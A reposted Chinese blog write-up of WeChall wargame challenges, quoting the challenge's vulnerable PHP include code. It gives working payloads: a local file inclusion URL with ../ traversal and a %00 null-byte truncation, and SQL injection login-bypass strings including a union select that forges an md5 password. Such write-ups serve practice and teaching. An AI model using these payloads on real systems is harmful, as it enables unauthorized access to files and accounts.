码迷,mamicode.com
首页 > 其他好文 > 详细

WeChall writeup

时间:2017-07-03 23:46:07      阅读:520      评论:0      收藏:0      [点我收藏+]

标签:mysq   page   username   http   https   byte   com   file   code   

PHP - Local File Inclusion

 

###############################
### Here is your exploit :) ###
###############################
$code = ‘$filename = \‘pages/\‘.(isset($_GET["file"])?$_GET["file"]:"welcome").\‘.html\‘;‘;
$code_emulate_pnb = ‘$filename = Common::substrUntil($filename, "\\0");‘; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = ‘include $filename;‘;
### End of exploit ###

将$code后的.html去掉,则可以构造语句截断url编码后%00,另一方面利用../跳转目录

则提交Payload

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

 

PHP-0817

Payload:

https://www.wechall.net/challenge/php0817/index.php?which=solution

 

Training:MYSQL I

Payload:

Username=‘admin‘ and 1=1#

 

Training:MYSQL II

Payload:

username=admin‘ union select 1,‘admin‘,md5(‘password‘);#

 

 

WeChall writeup

标签:mysq   page   username   http   https   byte   com   file   code   

原文地址:http://www.cnblogs.com/vincebye/p/7113447.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!